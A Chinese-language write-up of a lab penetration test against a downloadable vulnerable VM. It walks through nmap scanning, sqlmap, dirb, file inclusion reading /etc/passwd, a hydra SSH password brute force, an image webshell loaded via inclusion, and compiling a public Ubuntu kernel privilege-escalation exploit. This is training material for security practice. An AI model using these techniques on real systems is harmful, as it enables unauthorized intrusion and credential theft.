很多东西放到时间里去看就能看清楚。要么越走越远,要么越走越近。
下载地址:
链接:https://pan.baidu.com/s/1qaffdiwOFN8sI_qWJp1jlg
提取码:kger
复制这段内容后打开百度网盘手机App,操作更方便哦
使用VMware打开虚拟机,设置网络为仅主机模式即可
发现目标:
使用nmap的-sP参数去探测在当前局域网内存活的主机
1 | root@kali:~# nmap -sP 192.168.149.0/24 |
使用nmap的-sV扫描目标系统开放的服务,-p-表示对目标系统全部端口进行扫描,–script=banner表示使用nmap中的脚本去扫描目标系统的服务版本信息
1 | root@kali:~# nmap -sV -p- --script=banner 192.168.149.132 |
发现目标系统只开放了22端口和80端口,那么先从80端口尝试一番
探测SQL注入漏洞:
通过浏览器访问目标系统的80端口,出现下面的页面,需要展示SQL注入技巧,尝试了几个SQL万能密码都没办法成功,那么可以用sqlmap跑一跑,可能能跑出结果
因为使用burpsuite抓包的值是post类型的数据包,所以我们设置的sqlmap命令为:
1 | sqlmap.py -u "http://192.168.149.132/" --data="un=admin&ps=123456&login=let%27s+login" --dbms="mysql" --level=3 --batch |
但是跑了好久也没有跑出来,只能换一种方法
目录爆破:
试试目录爆破获取可以获取到有用的信息
我平时在Windows下使用的是御剑,kali 中用得是dirb和dirbuster
1 | root@kali:~# dirb http://192.168.149.132 |
当访问到test文件时,系统提示:
1 | 'file' parameter is empty. Please provide file path in 'file' parameter |
文件包含:
那么可以得出test文件内有一个文件包含函数,那么这里很有可能有个文件包含漏洞
原先构造URL为:
1 | http://192.168.149.132/test?file=/etc/passwd |
发现没有反应,那么可能需要构造post类型数据包
由passwd我们可以得出当时可以登录的账号为root和ica用户
我们可以使用hydra进行爆破试试
1 | hydra -l root -P /root/dict/1433-pass.txt -T 6 192.168.149.132 ssh |
当然hydra是可以爆破成功的,只要字典强大,爆出root密码为roottoor。这个等会用。
我们将刚刚爆破出来的文件一一下载看看里面有没有其他有用的内容
当在查看c.php文件时,发现其存在mysql数据库的账号和密码和数据库名。我们即可以通过数据库连接软件去连接
1 | <?php |
获得网站账号biLLu,密码hEx_it,然后成功登陆
在网站发现可以添加用户,并能上传图片,发现只能上传图片文件的后缀才可以,显然网站设置了白名单。
获取shell:
我们之前查看test文件包含的时候,下载了panel.php文件,这个文件也存在文件包含的功能
1 | if(isset($_POST['continue'])) |
那我们上传一个图片马上去,然后使用panel.php包含这个文件,成功获取到
刚刚在网上找这类靶机的文章,发现一位大佬爆破出phpmy目录,然后通过猜解路径去下载,这个文件默认路径在/var/www/phpmy下面,那么我们还可以通过文件包含下载这个文件,然后获取到root账号和密码
1 | <?php |
Ubuntu本地提权:
那么使用xshell去远程连接目标服务器,
1 | root@indishell:~# uname -a |
看到是Ubuntu12.04版本的,那么可以利用Ubuntu著名的本地提权exp
下载地址:https://www.exploit-db.com/exploits/37292
将EXP代码保存带文件内,然后赋予权限,进行编译
1 | root@indishell:~# vim exp.c |